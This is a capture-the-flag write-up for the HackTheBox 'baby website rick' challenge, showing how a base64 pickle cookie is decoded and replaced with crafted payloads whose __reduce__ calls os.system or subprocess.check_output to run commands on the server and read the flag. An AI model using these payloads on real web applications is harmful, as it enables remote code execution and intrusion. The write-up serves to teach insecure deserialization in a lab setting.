Baby website rick

8 December 2020

This write-up describes the challenge "baby website rick", part of the easy track OWASP Top 10 of the HackTheBox platform.

Getting a lead

The first info we are given is an IP address leading to a website. The site is named "insecure deserialization", so there's our first hint. The website does not contain any buttons or forms and does not communicate with any API in the background. It is only displaying this cryptic message:

Don't play around with this serum morty!! <main.anti_pickle_serum object at 0x7f8a85c50850>

If we take a look at the HTTP headers, we can see that the server is Werkzeug/1.0.1 Python/2.7.17. So we know the server is running python.

Werkzeug is a comprehensive WSGI web application library. It began as a simple collection of various utilities for WSGI applications and has become one of the most advanced WSGI utility libraries.

The first time we connect to the application, a cookie named plan_b is set. This cookie is then sent with every request made to the site.

plan_b
KGRwMApTJ3NlcnVtJwpwMQpjY29weV9yZWcKX3JlY29uc3RydWN0b3IKcDIKKGNfX21haW5fXwphbnRpX3BpY2tsZV9zZXJ1bQpwMwpjX19idWlsdGluX18Kb2JqZWN0CnA0Ck50cDUKUnA2CnMu

This cookie clearly looks like a base64 encoding, if we try to decode it, here is what we get:

(dp0
S'serum'
p1
ccopy_reg
_reconstructor
p2
(c__main__
anti_pickle_serum
p3
c__builtin__
object
p4
Ntp5
Rp6
s.

Things are getting interesting, we are seeing a reference to the anti_pickle_serum again, but what could this mean ?

We're in a pickle

The challenge is clearly hinting at a deserialization vulnerability, so the cookie could hold a serialized object. If we search for "insecure deserialization" on DuckDuckGo, the first result we get is a post explaining how insecure deserialization works with Python and a library called pickle. The server is running Python, the whole challenge has very strong references to the Pickle Rick episode, so I'd say we are on the right track. Let's dig deeper...

The first thing we want to validate is that the cookie plan_b is really an object serialized with pickle. To do so, let's adapt the python code we found when looking for "insecure deserialization" and take a look at the serialization:

import os
import _pickle

class Exploit(object):
    def __reduce__(self):
        return os.system, ('whoami',)

def serialize_exploit():
    shellcode = _pickle.dumps(Exploit())
    return shellcode

if __name__ == '__main__':
    shellcode = serialize_exploit()
    print(shellcode)

The result is this: \x80\x03cposix\nsystem\nq\x00X\x03\x00\x00\x00pwdq\x01\x85q\x02Rq\x03.. It doesn't look at all like the serialization we were looking at earlier. But wait, if we take a closer look at the pickle documentation we can see that there are multiple serialization formats called "protocols". We can choose the protocol when we perform the serialization: _pickle.dumps(Exploit(), protocol=2).

The example I copied from was using _pickle. This is just forcing the use of the optimizer written in C. Also, I am using Python 3.4 in this example when the server runs Python 2.7. That's a mistake on my part.

After trying every protocol, here is the result for protocol=0:

cposix\nsystem\np0\n(Vpwd\np1\ntp2\nRp3\n.

It does look a lot like our cookie now ! Let's validate that the serialization used is pickle with protocol 0.

Getting a feel of the server side

How about we try to pass in some deserialization exploits now? Unfortunately when we try to copy and paste some basic exploits, nothing works at this point. Fair enough, we're gonna have to invest some more time into understanding what the deserialized object really looks like.

The first thing we can do is try to understand the protocol 0 and the fields of the serialized object. There is no need to look for a specification, pickle offers us a tool named pickletools to help us deconstruct a file serialized with pickle. First we put our serialized object in a file fpickle, then we can run pickletools on it:

python3 -m pickletools fpickle
    0: (    MARK
    1: d        DICT       (MARK at 0)
    2: p    PUT        0
    5: S    STRING     'serum'
   14: p    PUT        1
   17: c    GLOBAL     'copy_reg _reconstructor'
   42: p    PUT        2
   45: (    MARK
   46: c        GLOBAL     '__main__ anti_pickle_serum'
   74: p        PUT        3
   77: c        GLOBAL     '__builtin__ object'
   97: p        PUT        4
  100: N        NONE
  101: t        TUPLE      (MARK at 45)
  102: p    PUT        5
  105: R    REDUCE
  106: p    PUT        6
  109: s    SETITEM
  110: .    STOP
highest protocol among opcodes = 0

So basically, it looks like our object is a dictionnary with one item "serum", holding a tuple (anti_pickle_serum, object).

Use python3 -m pickletools -a fpickle to get annotations that help understanding the format

Well, that kind of helped, but not that much, so how about deserializing the cookie ?

import _pickle
import base64

if __name__ == '__main__':
    encoded_string = "KGRwMApTJ3NlcnVtJwpwMQpjY29weV9yZWcKX3JlY29uc3RydWN0b3IKcDIKKGNfX21haW5fXwphbnRpX3BpY2tsZV9zZXJ1bQpwMwpjX19idWlsdGluX18Kb2JqZWN0CnA0Ck50cDUKUnA2CnMu"
    serialized = base64.b64decode(encoded_string)
    deserialized = _pickle.loads(serialized)
    print(deserialized)

When we try this, we get the following error:

AttributeError: Can't get attribute 'anti_pickle_serum' on  '__main__' from 'deserialize.py'>

It looks like pickle is expecting an attribute named anti_pickle_serum in main. Okay, how about we give it one ?

import _pickle
import base64

if __name__ == '__main__':
    anti_pickle_serum = "magnolia"
    encoded_string = "KGRwMApTJ3NlcnVtJwpwMQpjY29weV9yZWcKX3JlY29uc3RydWN0b3IKcDIKKGNfX21haW5fXwphbnRpX3BpY2tsZV9zZXJ1bQpwMwpjX19idWlsdGluX18Kb2JqZWN0CnA0Ck50cDUKUnA2CnMu"
    serialized = base64.b64decode(encoded_string)
    deserialized = _pickle.loads(serialized)
    print(deserialized)

Now we get a new error:

  File "[redacted]/lib/python3.6/copyreg.py", line 43, in _reconstructor
    obj = object.__new__(cls)
TypeError: object.__new__(X): X is not a type object (str)

This error is actually extremely interesting. First we are learning that the variable anti_pickle_serum should not be a string but an object. Then we are rediscovering some keywords that were in our serialized object: copyreg was copy_reg, and _reconstructor has kept the same name. We should take a look at this file copyreg.py and this function _reconstructor:

def _reconstructor(cls, base, state):
    if base is object:
        obj = object.__new__(cls)
    else:
        obj = base.__new__(cls, state)
        if base.__init__ != object.__init__:
            base.__init__(obj, state)
    return obj

So the function tries to create a new object from the parameter cls. If we put a breakpoint where the object is being created and relaunch our script, we see that cls holds our string magnolia. So the deserializer is creating the object held in the variable anti_pickle_serum.

From everything we've seen so far, in the next try we should store an object into anti_pickle_serum.

import _pickle
import base64


class Magnolia(object):
    def __reduce__(self):
        return print, ("Hello", )


if __name__ == '__main__':
    anti_pickle_serum = Magnolia
    encoded_string = "KGRwMApTJ3NlcnVtJwpwMQpjY29weV9yZWcKX3JlY29uc3RydWN0b3IKcDIKKGNfX21haW5fXwphbnRpX3BpY2tsZV9zZXJ1bQpwMwpjX19idWlsdGluX18Kb2JqZWN0CnA0Ck50cDUKUnA2CnMu"
    serialized = base64.b64decode(encoded_string)
    deserialized = _pickle.loads(serialized)
    print(deserialized)

This code is a double success. First we are not getting any errors, and second, the output is:

{'serum': <__main__.Magnolia object at 0x7fc3dcd0c080>}

This bloody looks like the string displayed on the website! At this point we can say we came pretty close to what is happening on the server side. Here is an estimation of the code used on the server:

    serialized = base64.b64decode(encoded_string)
    deserialized = _pickle.loads(serialized)
    print(deserialized["serum"])

Crafting the exploit

From all the intelligence we have gathered, we should be able to craft a proof of concept exploit now. In this first attempt we hope to execute whoami on the server and get the response, which should be root or a username:

import os
import cPickle
from base64 import b64encode


class Exploit(object):
    def __reduce__(self):
        return os.system, ('whoami',)


if __name__ == '__main__':
    shellcode = cPickle.dumps({"serum": Exploit()}, protocol=0)
    print(shellcode)
    print(b64encode(shellcode))

This gives us the following payload (which is the content of the cookie):

plan_b
KGRwMQpTJ3NlcnVtJwpwMgpjcG9zaXgKc3lzdGVtCnAzCihTJ3dob2FtaScKcDQKdHA1ClJwNgpzLg==

Unfortunately this doesn't print root or any username, instead we get this:

Don't play around with this serum morty!! 0

The 0 we are seeing is the exit code of the whoami function. So we need to craft a function that returns the output of the command executed; we use subprocess to do so:

import subprocess
import cPickle
from base64 import b64encode


class Exploit(object):
    def __reduce__(self):
        return subprocess.check_output, (['whoami'], )


if __name__ == '__main__':
    shellcode = cPickle.dumps({"serum": Exploit()}, protocol=0)
    print(shellcode)
    print(b64encode(shellcode))

This gives us the following payload:

KGRwMQpTJ3NlcnVtJwpwMgpjc3VicHJvY2VzcwpjaGVja19vdXRwdXQKcDMKKChscDQKUyd3aG9hbWknCnA1CmF0UnA2CnMu

Let's execute it and see... who am I ? And the result is:

Don't play around with this serum morty!! nobody

So it appears I am nobody. If we try ls -l we get the listing for the files in the current directory:

-rw-r--r--    1 root     root           637 Nov  2 15:53 app.py
-rw-r--r--    1 root     root            58 Nov  2 15:53 flag_wIp1b
drwxr-xr-x    3 root     root          4096 Nov  2 15:53 static
drwxr-xr-x    2 root     root          4096 Nov  2 15:53 templates

To solve the challenge, we just have to display the flag with cat flag_wIp1b. This concludes the write-up for this challenge!